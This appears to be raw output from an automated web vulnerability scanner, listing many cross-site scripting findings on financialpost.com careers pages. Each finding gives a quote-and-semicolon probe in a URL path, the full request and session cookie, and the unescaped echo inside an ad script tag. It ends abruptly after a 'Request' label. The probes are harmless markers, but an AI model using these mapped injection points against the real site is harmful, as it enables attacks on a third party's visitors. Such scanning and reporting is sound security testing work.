HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43228
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8274'%3b195d5cfee53 was submitted in the REST URL parameter 1. This input was echoed as b8274';195d5cfee53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogsb8274'%3b195d5cfee53/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36261
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5338f'%3bc1451072755 was submitted in the REST URL parameter 1. This input was echoed as 5338f';c1451072755 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers5338f'%3bc1451072755/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36303
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ebf'%3bee703a43543 was submitted in the REST URL parameter 1. This input was echoed as 60ebf';ee703a43543 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers60ebf'%3bee703a43543/Passionate+about+inclusion/3908742/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 81033 Expires: Sun, 19 Dec 2010 03:15:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers60ebf';ee703a43543/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers60ebf';ee703a43543;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31781956?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bc9'%3b34da138a151 was submitted in the REST URL parameter 3. This input was echoed as 17bc9';34da138a151 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Passionate+about+inclusion/390874217bc9'%3b34da138a151/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70051 Expires: Sun, 19 Dec 2010 03:15:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate-about-inclusion/390874217bc9';34da138a151/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate-about-inclusion;kw=390874217bc9';34da138a151;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39990 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ff7'%3bb3f1c59f563 was submitted in the REST URL parameter 4. This input was echoed as 29ff7';b3f1c59f563 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Passionate+about+inclusion/3908742/29ff7'%3bb3f1c59f563 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37230
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5c25'%3b9ab1b8da1c9 was submitted in the REST URL parameter 1. This input was echoed as d5c25';9ab1b8da1c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careersd5c25'%3b9ab1b8da1c9/Pink+collar+jobs+spare+women+from+recession/3951473/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74447 Expires: Sun, 19 Dec 2010 03:15:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careersd5c25';9ab1b8da1c9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careersd5c25';9ab1b8da1c9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70150980?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7af'%3b3e6963f564a was submitted in the REST URL parameter 3. This input was echoed as bb7af';3e6963f564a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473bb7af'%3b3e6963f564a/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63862 Expires: Sun, 19 Dec 2010 03:15:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink-collar-jobs-spare-women-from-recession/3951473bb7af';3e6963f564a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink-collar-jobs-spare-women-from-recession;kw=3951473bb7af';3e6963f564a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42d4'%3b113cc4c7a9f was submitted in the REST URL parameter 4. This input was echoed as d42d4';113cc4c7a9f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473/d42d4'%3b113cc4c7a9f HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37780
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67407'%3b92dac48a721 was submitted in the REST URL parameter 1. This input was echoed as 67407';92dac48a721 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers67407'%3b92dac48a721/Rules+keep+work+parties+festive/3978714/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74402 Expires: Sun, 19 Dec 2010 03:15:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers67407';92dac48a721/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers67407';92dac48a721;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95963968?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f598'%3b1d4c31151fb was submitted in the REST URL parameter 3. This input was echoed as 5f598';1d4c31151fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Rules+keep+work+parties+festive/39787145f598'%3b1d4c31151fb/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63421 Expires: Sun, 19 Dec 2010 03:15:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules-keep-work-parties-festive/39787145f598';1d4c31151fb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules-keep-work-parties-festive;kw=39787145f598';1d4c31151fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord= ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a25'%3b364cbeb8eca was submitted in the REST URL parameter 4. This input was echoed as 71a25';364cbeb8eca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Rules+keep+work+parties+festive/3978714/71a25'%3b364cbeb8eca HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44245
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19264'%3b66fe6c3fb0d was submitted in the REST URL parameter 1. This input was echoed as 19264';66fe6c3fb0d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers19264'%3b66fe6c3fb0d/Texting+lazy+IMHO/3941140/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 78645 Expires: Sun, 19 Dec 2010 03:15:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers19264';66fe6c3fb0d/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers19264';66fe6c3fb0d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69933413?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26269'%3b7e045e51a09 was submitted in the REST URL parameter 3. This input was echoed as 26269';7e045e51a09 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Texting+lazy+IMHO/394114026269'%3b7e045e51a09/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 62901 Expires: Sun, 19 Dec 2010 03:15:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting-lazy-imho/394114026269';7e045e51a09/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting-lazy-imho;kw=394114026269';7e045e51a09;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95168182?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b2fc'%3b095459ca46b was submitted in the REST URL parameter 4. This input was echoed as 1b2fc';095459ca46b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Texting+lazy+IMHO/3941140/1b2fc'%3b095459ca46b HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44669
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1639b'%3b9b5d88f64ad was submitted in the REST URL parameter 1. This input was echoed as 1639b';9b5d88f64ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers1639b'%3b9b5d88f64ad/writing+workers+with+children/3943108/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73488 Expires: Sun, 19 Dec 2010 03:15:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers1639b';9b5d88f64ad/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers1639b';9b5d88f64ad;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=15492710?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da20f'%3bafe2f9b541b was submitted in the REST URL parameter 3. This input was echoed as da20f';afe2f9b541b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
